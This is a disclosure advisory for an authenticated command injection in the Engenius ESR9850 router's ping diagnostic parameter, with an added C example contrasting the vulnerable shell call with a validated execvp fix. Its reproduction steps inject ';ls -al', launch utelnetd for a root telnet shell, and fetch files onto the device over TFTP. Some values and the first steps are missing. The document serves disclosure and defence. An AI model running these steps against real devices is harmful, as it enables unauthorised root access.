Description: The Engenius ESR9850 Wireless Router is vulnerable to command injection via the device's web administrative interface. Arbitrary commands can be executed, and the output of an injected command can be observed partially (a single line only) in the HTTP response. In addition, because the 'utelnetd' binary is present on the device, a telnet service can be started through this command injection and then connected to on port 23 to gain a root shell without any further authentication. Exploitation requires authenticated access (HTTP basic authentication) to the web administrative interface.

*There is an option that allows administrative access from the internet via port 8080, but it has to be turned on manually by the administrator. By default, the web interface can only be accessed locally. When the option is enabled, the risk rating increases significantly.

Impact: An attacker could gain full administrative (root) access to the embedded operating system, which runs Busybox on a Linux kernel. This allows the attacker to perform privileged actions beyond what the device's web administrative interface exposes.

Cause: The URL that is vulnerable to command injection is located at and the affected parameter is 'diagipaddr'. The page is intended to let users run a 'ping' for diagnostic purposes. Although the page contains JavaScript that prevents the user from submitting anything other than an IP address, the HTTP request can be intercepted to bypass this client-side check. There is no server-side validation of the diagipaddr parameter, and the untrusted input is placed inline in a shell statement. As a result, command injection is achieved by appending ';' to the normal input (an IP address) followed by an arbitrary Linux command.
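The following is an added example, not code from this advisory or from the Engenius firmware: a minimal C model of the pattern the Cause paragraph describes (the diagipaddr value spliced into a shell command string and handed to system()) beside a hardened handler that validates the value server-side as a dotted-quad IPv4 address with inet_pton() and then executes ping through an argv vector, so no shell ever parses it. The function names, the ping count of 4, the buffer size and the sample payload are assumptions; the real handler and its URL are not shown on this page. The allow-list check goes slightly further than the single ';' case in the text: it also rejects '|', '&&', backticks and '$()', which a blacklist of ';' alone would miss.

```c
/* Added example (not from the advisory or the vendor firmware): the
 * vulnerable construction beside a hardened one. Names, the ping count
 * and the sample payload are assumptions for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <arpa/inet.h>

/* VULNERABLE pattern: the untrusted 'diagipaddr' value is spliced into a
 * shell command line. With the constructed input "192.168.1.1;ls -al" the
 * shell runs ping and then ls. Returns the string that would be handed to
 * system(); this model deliberately does not execute it. */
const char *unsafe_ping_cmd(const char *diagipaddr)
{
    static char cmd[256];
    snprintf(cmd, sizeof cmd, "ping -c 4 %s", diagipaddr);
    return cmd;   /* the original handler would call system(cmd) here */
}

/* Allow-list check: accept only a dotted-quad IPv4 address. inet_pton()
 * rejects ';', '|', '&', '`', '$(' and every other shell metacharacter
 * because none of them can appear in a valid address. On success the
 * canonical form is written to 'out' (INET_ADDRSTRLEN bytes) when out is
 * non-NULL. Returns 1 if accepted, 0 if rejected. */
int validate_diag_ip(const char *diagipaddr, char *out)
{
    struct in_addr addr;
    if (diagipaddr == NULL || strlen(diagipaddr) >= INET_ADDRSTRLEN)
        return 0;
    if (inet_pton(AF_INET, diagipaddr, &addr) != 1)
        return 0;
    if (out != NULL && inet_ntop(AF_INET, &addr, out, INET_ADDRSTRLEN) == NULL)
        return 0;
    return 1;
}

/* HARDENED handler: validate on the server, then exec ping directly with
 * an argv vector so the user-supplied value is never parsed by a shell.
 * Returns -1 if the input is rejected (nothing is executed), otherwise the
 * exit status of ping. */
int diag_ping_safe(const char *diagipaddr)
{
    char ip[INET_ADDRSTRLEN];
    if (!validate_diag_ip(diagipaddr, ip))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "4", ip, NULL };
        execvp("ping", argv);   /* argv elements are passed verbatim */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* constructed attacker input, mirroring the advisory's ';'-based payload */
    const char *payload = "192.168.1.1;ls -al";
    printf("unsafe handler would pass to system(): %s\n", unsafe_ping_cmd(payload));
    printf("safe handler result for the same input: %d (rejected, not executed)\n",
           diag_ping_safe(payload));
    return 0;
}
```

The design point is that the fix is not to strip ';' from the input: any character set filter can be bypassed by a metacharacter it forgot. Accepting only what a parser for the expected type (here an IPv4 address) recognises, and then avoiding the shell entirely with execvp(), removes the injection surface regardless of which metacharacter the attacker tries.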
Interim Workaround: Ensure that access to the web administrative interface is protected with a strong password that is at least 12 characters long and contains at least one of each of the following: an uppercase letter, a lowercase letter, a number, and a special character. In addition, use HTTPS to prevent a man-in-the-middle attack that could compromise the credentials in transit between the administrator and the router.

Solution: No official fix at this point in time. It should also be noted that the product has been discontinued.

3. Append ;ls+-al to the diagipaddr parameter. You should observe that ls is successful, with partial results (only a single line) visible in the HTTP response. FURTHER INFORMATION: Because of the limited verbosity and flexibility of this single-line channel, a full shell is much desired. Use grep -v -e expression1 -e expression2 ... (grep inverse select) to skip lines already seen, and recursively ls -al the directories to gain information about their contents.

4. Using the information obtained, a utelnetd binary is discovered at the following path: /apps/sbin/utelnetd. Launch the telnet service with the command: /apps/sbin/utelnetd start 5. After about 5-10 seconds, re-run an Nmap scan against and a new service is discovered: telnet 23/tcp. FURTHER INFORMATION: Further inspection indicated that the HTTP server runs with root privileges. utelnetd is therefore spawned with root privileges, which yields a root shell via the telnet service.

6. Connect to the telnet service using telnet . You should observe that the telnet shell is running as UID 0 (root). 7. Uploading files is possible by setting up a TFTP server and invoking tftp -g -r filename.txt server_ip to transfer files onto the device.

8. To verify the firmware version, go to /tmp and run cat fw_version. 9. The firmware currently installed is V . The latest available firmware is V2.1.4 (as of ); however, command injection is not part of the documented list of fixes. Changelog downloaded on